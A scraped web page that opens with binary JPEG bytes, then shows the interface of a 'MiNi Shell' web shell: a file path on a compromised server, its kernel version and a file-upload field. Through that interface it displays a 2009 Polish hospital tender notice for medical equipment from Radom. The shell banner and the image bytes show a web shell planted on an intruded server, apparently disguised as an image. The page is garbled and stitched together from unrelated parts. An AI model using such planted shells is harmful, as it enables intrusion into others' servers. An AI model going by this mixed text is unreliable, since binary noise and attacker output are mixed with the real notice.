JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090708/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090708/228838-N-2009.html

<p class="kh_header"><b>Radom: zakup i dostawa urządzeń medycznych (łóżko szpitalne 3 szt., inhalator 2 szt., pompa infuzyjna 3 szt., pompa żywieniowa 3 szt., aparat AMBU 1 szt., aparat EKG 1 szt., leżanka 5 szt., materac zmiennociśnieniowy 6 szt., myjnia dezynfektor 2 szt., łóżko elektryczne egerton 29 szt., ssak elektryczny 2 szt., laser terapeutyczny 1 szt., aparat do krioterapii 1 szt., stół zabiegowy 4 szt.) dla potrzeb Zakładu Opieki Długoterminowej z Zakładem Pielęgnacyjno - Opiekuńczym, Zakładem Opiekuńczo - Leczniczym Radomskiego Szpitala Specjalistycznego.</b><br>
<b>Numer ogłoszenia: 228838 - 2009; data zamieszczenia: 08.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Radomski Szpital Specjalistyczny im. dr Tytusa Chałubińskiego , ul. Tochtermana 1, 26-610 Radom, woj. mazowieckie, tel. 048 3615285, 3615284, faks 048 3615213.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.radom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> zakup i dostawa urządzeń medycznych (łóżko szpitalne 3 szt., inhalator 2 szt., pompa infuzyjna 3 szt., pompa żywieniowa 3 szt., aparat AMBU 1 szt., aparat EKG 1 szt., leżanka 5 szt., materac zmiennociśnieniowy 6 szt., myjnia dezynfektor 2 szt., łóżko elektryczne egerton 29 szt., ssak elektryczny 2 szt., laser terapeutyczny 1 szt., aparat do krioterapii 1 szt., stół zabiegowy 4 szt.) dla potrzeb Zakładu Opieki Długoterminowej z Zakładem Pielęgnacyjno - Opiekuńczym, Zakładem Opiekuńczo - Leczniczym Radomskiego Szpitala Specjalistycznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres nr 1 - łóżko szpitalne 3 szt.
Lp.	Parametry wymagane
1.		Łóżko szpitalne przeznaczone dla dorosłego pacjenta, na kołach jezdnych z centralną blokadą kół
2.		Wymiary:
a)	szerokość łóżka:   965 - 1000 mm
b)	długość łóżka:    2100 - 2200 mm
c)	wysokość leża:     500 ? 5 mm
3.		Leże dwusegmentowe, wypełnione metalową, odejmowaną kratą.
4.		Rama leża: podwozie oraz segmenty leża wraz z siatkami wykonane z profili stalowych, pokrytych lakierem proszkowym.
5.		Sekcja oparcia pleców regulowana za pomocą przekładni ręcznej wspomaganej sprężyną gazową.
6.		Szczyty łóżka wypełnione płytą wodoodporną -  kolor do uzgodnienia.
7.		Zabezpieczenia przed uderzeniami w postaci krążków oraz listew odbojowych.
8.		Po obydwu stronach łóżka wieszaki do mocowania dodatkowego wyposażenia.
9.		Wyposażenie:
a). po obu stronach łóżka odejmowane poręcze boczne, chromowane, zabezpieczające przed wypadnięciem pacjenta
b). wieszak kroplówki
c). materac - wysokość 10 cm, w pokrowcu z tkaniny nieprzemakalnej, paraprzepuszczalnej
10.		Gwarancja (min. 12 miesiące)
Zakres nr 2 - inhalator 2 szt.
L.p.	Parametry wymagane
1.	Aktywowany wdechem - średnio 1ml/min
2.	Zasilanie 230V lub bateryjnie
3.	Waga max 60g
4.	Wyposażenie podstawowe: 
- ustnik
- wężyk
- nebulizator kompatybilny z zaoferowanym inhalatorem
Zakres nr 3 - pompa infuzyjna 3 szt.
Lp.	Parametry wymagane
1.		Zasilanie sieciowe
2.		Całkowita masa pompy wraz z akumulatorami do 3 kg
3.		Wewnętrzne zasilanie akumulatorowe (min. 8h dla 5ml/h)
4.		Zacisk do stojaka o rozmiarach standardowych
5.		Prędkość podawania (minimalny zakres) od 0,1 do 1200ml/h (programowana co 0,1ml w zakresie 0,1-99,9 ml/h)
6.		Możliwość programowania pompy w różnych jednostkach: objętości, masy oraz z uwzględnieniem masy ciała pacjenta
7.		Programowanie objętości infuzji w zakresie 0,1 do 999 ml
8.		Możliwość programowania profili pracy pompy (np. propofol)
9.		Programowana szybkość i objętość bolusa
10.		Szybkość bolusa min. 1200 ml/h
11.		Dokładność +/- 2%
12.		Alarmy:
a) Złego zamocowania strzykawki
b) Okluzji
c) Końca wlewu
d) Pustej strzykawki
e) Wyładowanych akumulatorów
f) Błędu podaży
g) Brak aktywności przez 3 min.
13.		Funkcja KVO
14.		Klawiatura numeryczna
15.		Zmiana prędkości podaży bez konieczności zatrzymywania pracy pompy oraz możliwość zablokowania tej funkcji
16.		Możliwość blokowania parametrów hasłem
17.		Pompa wyposażona w wewnętrzną listę leków (min. 15) oraz możliwość dopisywania nazw leków przez użytkownika
18.		Programowania progów ciśnienia okluzji min. 5 progów
19.		Redukcja ciśnienia w układzie w przypadku osiągnięcia progu alarmu okluzji.
20.		Automatyczne rozpoznawanie rozmiaru strzykawki
21.		Możliwość stosowania strzykawek w rozmiarach min. 10,20,30,50/60 ml
22.		Możliwość stosowania strzykawek wielu producentów (min. trzech polskich)
23.		Funkcja pauzy
24.		Instrukcja obsługi w jęz. polskim i szkolenie personelu.
Zakres nr 4 - pompa żywieniowa 3 szt.
Lp.	Parametry wymagane
1.		Zasilanie sieciowe
2.		Wewnętrzne zasilanie akumulatorowe
3.		Wyświetlanie danych cyfrowych
4.		Zacisk do stojaka o rozmiarach standardowych
5.		Programowanie prędkości 1 ml/h do 200 ml/h
6.		Programowanie wielkości dawki
7.		Dokładność podaży min +/- 10%
Zakres nr 5 - aparat AMBU 1 szt.
L.p.	Parametry techniczne
1.	Worek reanimacyjny 1600 ml 
2.	Zbiornik na tlen (2600 ml). 
3.	Maska. 
4.	Przewód tlenowy. 
5.	Komplet rurek ustno-gardłowych. 
6.	Trwała plastikowa walizka. 
Zakres nr 6 - aparat EKG 1 szt.
Lp.	Parametry techniczne
1.		Aparat 3, 6 i 12 kanałowy
2.		Praca w trybie Auto i Manual
3.		Klawiatura alfanumeryczna
4.		Detekcja stymulatora serca
5.		Wyświetlacz graficzny prezentujący przebieg min 3 kanałów
6.		Liniowa głowica termiczna, automatyczna regulacja linii izoelektrycznej
7.		Filtracja zakłóceń sieciowych i mięśniowych
8.		Sygnał EKG - 12 odprowadzeń standardowych
9.		Czułość: 2,5/5/10/20 mm/mV
10.		Prędkość zapisu 25/50 mm/s
11.		Rodzaj i szerokość papieru
12.		Zasilanie 90-240 V, 50-60 Hz, wbudowany akumulator
13.		Funkcja rejestracji danych pacjenta
14.		Prosty w obsłudze, poręczny, łatwy w transporcie, umieszczony na wózku
15.		Wyposażenie dodatkowe: przewód sieciowy, kabel EKG, papier EKG, wózek EKG
Zakres nr 7 - leżanka 5 szt.
Lp.	Parametry techniczne
1.	Regulacja kąta nachylenia zagłówka
2.	Konstrukcja metalowa 
3.	Materac bezszwowy, wypełniony miękką pianką.
4.	Obciążenie min. 120 kg
5.	Odporność na działanie środków dezynfekcyjnych.
Zakres nr 8 - materac zmiennociśnieniowy 6 szt.
Lp.	Parametry techniczne
1.		System pracy zmiennociśnieniowy. Komory kołyskowe umieszczone w kilkunastu rzędach winny napełniać się powietrzem i opróżniać na przemian (co druga) w cyklu 10-minutowym. Materac wykonany z elastycznego  poliuretanu (nieusztywnionego) zapewniającego wieloletnie użytkowanie, zbudowany z poprzecznych odpinanych komór o wysokości powyżej 11 cm. Rozmiary materaca dostosowane do standardowego łóżka szpitalnego.
2.		Ciśnienie wywierane na ciało pacjenta przez materac w granicach 20-70 mmHg, regulowane ręcznym manometrem w zależności od wagi i pozycji pacjenta.
3.		Materac zapewniający nacisk na ciało leżącego poniżej 20mmHg w czasie przynajmniej 50% cyklu pracy materaca-do potwierdzenia wykresem zmian ciśnienia w czasie jednego pełnego cyklu, w jednej komorze materaca, przy regulatorze ustawionym na co najmniej 40% zakresu regulacji ciśnienia.
4.		Maksymalna waga pacjenta do 140 kg
5.		Materac wyposażony w zasilacz pneumatyczny zawieszany na ramie łóżka z możliwością ustawienia na podłodze, posiadającą wskaźniki sygnalizujące:
- pracę materaca
- brak właściwego ciśnienia z sygnalizacją świetlną i dźwiękową
- przerwy w zasilaniu prądem
6.		Materac pokryty odpinanym pokrowcem przepuszczającym parę wodną i powietrze, a zatrzymującym ciecze, wykonanym z dzianiny rozciągliwej we wszystkich kierunkach, zawierającego środki bakterio- i grzybobójcze oraz elektrostatyczne.
7.		Materac kładziony na standardowy materac szpitalny.
8.		Możliwość transportu pacjenta na materacu pozbawionym zasilania w czasie  ok. 1 godz.
9.		Możliwość szybkiego spuszczenia powietrza. Materac zaopatrzony w zawór CPR.
10.		Możliwość wielokrotnego mycia, dezynfekcji i sterylizacji.
Zakres nr 9 - myjnia dezynfektor 2 szt.
Lp.	Parametry wymagane
1.		Sterowanie mikroprocesorowe
2.		Wyświetlacz ciekłokrystaliczny (LCD) z komunikatami tekstowymi
3.		Model wiszący na ścianie
4.		Szerokość urządzenia max. 600 mm
5.		Głębokość myjni max. 500 mm
6.		Podgrzewanie elektryczne, wbudowana wytwornica pary
7.		Dezynfekcja termiczna 
8.		Drzwi uchylne, otwierane do przodu 
9.		Automatyczne otwieranie i zamykanie drzwi za pomocą pedału nożnego
10.		Automatyczne dozowanie detergentu
11.		Końcowe schładzanie wsadu zimna wodą
12.		Obudowa ze stali nierdzewnej
13.		Kondensacja oparów
14.		Minimalny załadunek komory: 2 baseny lub 3 kaczki 
15.		Załadunek komory powyżej 2 basenów
16.		Ilość programów mycia i dezynfekcji dostępnych z panelu sterującego
17.		Możliwość zmiany programów myjących przez użytkownika 
18.		Możliwość mycia innego wyposażenia (m. in. (butle ssaków, miski, wiadra, itp.)
19.		Miejsce na pojemniki środków chemicznych (poj. 5 litrów) w myjni, min. 1 pojemnik
20.		Komunikaty wyświetlane w języku polskim
22.	Zasilanie elektryczne max. 10kW

Zakres nr 10 - łóżko elektryczne egerton 29 szt.
Lp.	Parametry techniczne
1.	Łóżko rehabilitacyjne wielofunkcyjne elektryczne - do ogólnej pielęgnacji z możliwością rehabilitacji
2.	Konstrukcja nośna z profili stalowych pokrytych lakierem - segmenty leża wypełnione stalową kratą (dopuszcza się konstrukcję łóżka ramową umożliwiającą zamontowanie podwójnej ramy wyciągowej (rehabilitacyjnej)
3.	Ramy szczytów łóżek chromowane (szczyty o wym. 40-50 cm)
4.	Barierki boczne chromowane - na całej długości leża (lub pokrywające 75% długości leża) o wym. w granicach 37-50 cm
5.	Szerokość całkowita z odbojami 96-104 cm
6.	Długość całkowita z odbojami 205-221 cm
7.	Leże łóżka czterosegmentowe, w tym trzy segmenty ruchome
8.	Elektryczne regulacje - regulacja wysokości łóżka 45-80 cm lub 42-77,5 cm lub 43-80,5 cm, regulacja segmentu oparcia pleców 700
9.	Pozycja Trendelenburga około 150, pozycja anty-Trendelenburga minimum 50 (dopuszcza się pozycję anty-Trendelenburga minimum do 120).
10.	Regulacja segmentu podudzia - ręczny mechanizm zapadkowy
11.	Regulacja segmentu uda (dopuszcza się elektryczną regulację segmentu uda)
12.	Cztery koła jezdne z centralną dźwignią blokady kół. Jedno z kół posiada blokadę kierunkową umożliwiającą jazdę na wprost
13.	Szczyty łóżka z możliwością łatwego wyjmowania z ramy leża wykonane z płyty laminowanej (możliwość wyboru koloru szczytów)
14.	Rama łóżka posiadająca elementy zabezpieczające lóżko przed obiciem, tj. 4 krążki umieszczone na szczytach i 2 listwy odbojowe po bokach łóżka (dopuszcza się łóżko bez listew odbojowych)
15.	Funkcja CPR, tj. awaryjna mechaniczna możliwość uzyskania pozycji półpłaskiej (reanimacyjnej) oparcia pleców
16.	Funkcja autoregresji segmentu oparcia pleców, która zapobiega  przed zsuwaniem się pacjenta z łóżka
17.	Pilot przewodowy sterujący z możliwością blokad funkcji leża (dopuszcza się łóżko posiadające przycisk natychmiastowego wyłączenia wszystkich funkcji elektrycznych)
18.	Zintegrowane przedłużenie leża do 20 cm wypełnione dodatkowym materacem
19.	Dodatkowe wyposażenie do każdego łóżka:
-	uchwyt do kroplówek przy szczycie łóżka (chromowany)
-	uchwyty na worek do cewnika, kaczkę, basen
-	wysuwana zintegrowana półka na pościel (lakierowana)
-	kosz do ułożenia ciapów pacjenta
-	uchwyt do podwieszania kabla elastycznego i uchwyt na pilot do obsługi elektrycznej łóżka (dopuszcza się rozwiązanie konstrukcyjne polegające na zintegrowaniu z pilotem przewodowym elastycznego uchwytu umożliwiającego powieszenie pilota na poręczach bocznych, ramach szczytów, ramie leża oraz innych elementach wyposażenia dodatkowego łóżka)
-	materac z pianki poliuretanowej o wysokiej gęstości: grubość około 100mm, w pokrowcu nieprzemakalnym, zmywalnym, paroprzepuszczalnym, przystosowanym do dezynfekcji,
-	materac antyodleżynowy zmiennociśnieniowy, wysokość ok. 12 cm z systemem CRP (szybkiego wypuszczania powietrza).
-	wysięgnik z uchwytem do ręki mocowany po obu stronach wezgłowia - 2 szt.
20.	Gwarancja min. 24 miesiące	
21.	Dopuszcza się maksymalne obciążenie robocze na poziomie 230 kg (parametr nie wymagany).
Zakres nr 11 - ssak elektryczny 2 szt.
Lp.	Parametry techniczne
1.		Wymiary zewnętrzne (wys. x szer. X gł.) [mm]
2.		Zasilanie AC 230V, 50 Hz +/- 10%
3.		Pobór mocy do 100 W
4.		Kabel zasilający ok. 2,00 m
5.		Czas pracy > 240 min. bez wyłączania przy nominalnym napięciu i w zależności od warunków środowiska
6.		Waga do 18 kg
7.		Podstawa jezdna z dwoma hamowanymi kołami
8.		Wyłącznik nożny 
9.		Wydajność ssania min. 30  l/min
10.		Poziom hałasu poniżej 45dB
11.		Maks. podciśnienie - 85 kPa
12.		Pojemnik z możliwością sterylizacji, o średnicy max. 11 cm, z nietłukącego tworzywa, o pojemności 2000 ml, z podziałką co 25 ml, do pomiaru zawartości - 2 szt/ssak
13.		Wkłady jednorazowe dwulitrowe, o średnicy 11 cm - 20 szt./ssak
14.		Dren silikonowy do pacjenta
15.		Wszystkie elementy ssaka łatwe do utrzymania w czystości
16.		Zabezpieczenie przed przelaniem pompy
Zakres nr 12 - laser terapeutyczny 1 szt.
Lp.	Parametry (funkcja) wymagane
1.	Sonda czerwona  (światło widzialne) 
685 nm (długość fali) 
50 mW (moc)
2.	Sonda podczerwona (światło niewidzialne) 
830 nm (długość fali)
400 mW (moc)
3.	Sonda prysznicowa (łączona IR + R) 
4 x 50 mW /685 nm
4 x 400 mW /830 nm
4.	Tryb pracy 
Ciągły
Impulsowy  0,1 - 10000 Hz (płynna regulacja)
	
5.	Typ lasera - półprzewodnikowy
6.	Klasa lasera - 3B
7.	Regulacja mocy - 20 - 100 %
8.	Ekran dotykowy 
9.	Kartoteka (baza danych) pacjentów w pamięci aparatu
10.	Bank programów terapeutycznych zapisanych w pamięci aparatu (gotowe diagnozy)
11.	Możliwość tworzenia i zapisywania własnych programów terapeutycznych
12.	Możliwość przypisywania terapii do pacjenta i zapisywania w pamięci aparatu
13.	Częstotliwości Nogiera i EAV
14.	Autotest podłączonych sond laserowych
15.	Wysięgnik do sondy prysznicowej
16.	Specjalistyczny stolik do aparatu o stabilne konstrukcji
17.	Okulary ochronne - 2 szt.
18.	Obsługa aparatu oraz instrukcja w języku polskim
19.	Zasilanie - 230V/50-60 Hz
Zakres nr 13 - aparat do krioterapii 1 szt.
Lp.	Parametry wymagane
1.		Aparat do kriostymulacji, z obudową mieszczącą 10 litrową butlę syfonową, pracujący w systemie CO2
2.		Obudowa - jezdna - na kółkach
3.		Ciepła, izolowana dysza nadmuchowa
4.		Elastyczny przewód zasilający umożliwia swobodną manipulację dyszą podczas zabiegu
5.		Trzy rodzaje dysz nadmuchowych: duża, średnia, mała
6.		Wskaźnik temperatury każdej dyszy
7.		Przewód pneumatyczny do dyszy oraz butli
8.		Złącze butli z filtrem
9.		Zapasowa butla na CO2
10.		Zapasowe uszczelki CO2
11.		Zapasowy wkład filtra
12.		Pełna gwarancja przez okres min.2 lat od daty zakupu. W tym okresie Zamawiający nie ponosi żadnych kosztów napraw i przeglądów sprzętu.
Zakres nr 14 - stół zabiegowy 4 szt.
Lp.	Parametry wymagane
1	Stół przeznaczony do przeprowadzania zabiegów opatrunkowych i prostych zabiegów chirurgicznych
2	Blat stołu zawiera, co najmniej 4 segmenty: podgłówek, oparcie pleców, oparcie bioder i podnóżek (dwuczęściowy)
3	Segmenty blatu stołu pokryte materacami bezszwowymi, wypełnionymi miękką pianką
4	Konstrukcja stołu przystosowana do monitorowania pacjenta i wykonywania zdjęć RTG
5	Metalowe elementy konstrukcyjne stołu wykonane ze stali nierdzewnej. 
6	Całkowita długość blatu stołu: 2000-2100mm
7	Całkowita szerokość blatu stołu: 550-600mm
8	Stół wyposażony w przejezdną podstawę z centralną blokadą wszystkich kół.
9	Regulacja wysokości stołu w zakresie min. 800-1000mm, przy użyciu nożnej pompy hydraulicznej.
10	Ustawianie segmentów blatu stołu wspomagane sprężynami gazowymi.
11	Pozycja Trendelenburga blatu stołu regulowana w zakresie min. 0-30o
12	Pozycja anty-Trendelenburga blatu stołu regulowana w zakresie min. 0-10o
13	Regulacja nachylenia segmentu oparcia pleców w zakresie min. 0-80o
14	Regulacja nachylenia segmentu podgłówka w zakresie min. 0-40o
15	Regulacja nachylenia segmentu podnóżka (każdej części) w zakresie min. 0-90o
16	Odporność wszystkich elementów stołu na działanie środków dezynfekcyjnych.
17	Stół wyposażony, w co najmniej: wieszak kroplówki 
(1 szt.), podpora ręki (2 szt.), ramka ekranu (1 szt.).
18	Konstrukcja stołu przystosowana do zainstalowania wyposażenia dodatkowego, znajdującego się w programie produkcyjnym producenta, dobieranego w zależności od potrzeb (np. dla zabiegów ortopedycznych, proktologicznych, laryngologicznych itp.)
19	Dopuszczalne obciążenie blatu stołu: min. 200kg.
20	Masa stołu: max 150kg..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.19.21.20-9, 33.15.72.00-7, 33.19.41.10-0, 33.19.41.00-7, 33.15.77.00-2, 33.12.15.00-9, 33.19.21.00-3, 39.14.31.12-4, 33.19.11.00-6, 33.19.21.20-9, 33.14.16.00-6, 33.16.91.00-3, 33.16.50.00-4, 33.19.22.10-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 14.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zakres nr 1 -     200,00 PLN 
Zakres nr 2 -     380,00 PLN 
Zakres nr 3 -     360,00 PLN 
Zakres nr 4 -      200,00  PLN 
Zakres nr 5 -        13,00 PLN 
Zakres nr 6 -      180,00 PLN 
Zakres nr 7 -        90,00 PLN 
Zakres nr 8 -      320,00 PLN 
Zakres nr 9 -   2.230,00 PLN  
Zakres nr 10 - 6.400,00 PLN 
Zakres nr 11 -    240,00 PLN 
Zakres nr 12 -    830,00 PLN 
Zakres nr 13 -    740,00 PLN 
Zakres nr 14 -    210,00 PLN<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Warunki ogólne:
Wykonawca nie może podlegać wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24, ust. 1 i ust. 2 ustawy Prawo zamówień publicznych.
Warunki szczegółowe:
Potencjał kadrowy: Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania przedmiotu zamówienia. Powyższy warunek powinien być spełniony łącznie przez podmioty składające wspólną ofertę.
Doświadczenie: Wykonawca musi wykazać, że zrealizował w okresie ostatnich 3 lat kalendarzowych (przed dniem wszczęcia postępowania), a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, min. 1 zamówienie odpowiadające swoim rodzajem i wartością oferowanemu przedmiotowi zamówienia. Powyższy warunek powinien być spełniony łącznie przez podmioty składające wspólną ofertę .
Potencjał techniczny: Wykonawca dysponuje potencjałem technicznym niezbędnym do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego. Powyższy warunek powinien być spełniony łącznie przez podmioty składające wspólną ofertę.
Potencjał finansowo-ekonomiczny: Wykonawca dysponuje własnymi środkami finansowymi zapewniającymi wykonanie zamówienia. Powyższy warunek powinien być spełniony łącznie przez podmioty składające wspólną ofertę
Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Oświadczenie Wykonawcy, że nie podlega wykluczeniu na podstawie art. 24, ust. 1 i ust. 2 ustawy Pzp.
2.	Oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22, ust. 1, pkt. 1-3 ustawy Pzp. 
3.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, a w przypadku wykonawcy, który ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej - dokument wystawiony w kraju w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że nie otwarto jego likwidacji ani nie ogłoszono jego upadłości, jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa powyżej zastępuję się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiedniego kraju pochodzenia osoby lub kraju w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
4.	Informację o doświadczeniu zawodowym Wykonawcy (Doświadczenie zawodowe). Informacja musi potwierdzać spełnienie szczegółowego warunku udziału w postępowaniu. Do informacji winny być dołączone dokumenty potwierdzające, że wymienione w informacji dostawy zostały wykonane należycie.
5.	Zaświadczenia podmiotu uprawnionego do kontroli jakości potwierdzającego, że oferowane urządzenie odpowiada określonym normom lub specyfikacjom technicznym, tj. deklaracja zgodności CE wystawiona przez producenta lub certyfikat jednostki notyfikowanej uczestniczącej w procesie notyfikacji zgodnie z ustawą z dnia 20 kwietnia 2004r. o wyrobach medycznych (tekst jednolity Dz.U. z 2004r. nr 93 poz.896) lub zaświadczenie o wpisie do Rejestru Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych.   
6.	Katalogi, foldery oferowanego towaru w języku polskim.
7.	Dokument potwierdzający wniesienie wadium..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
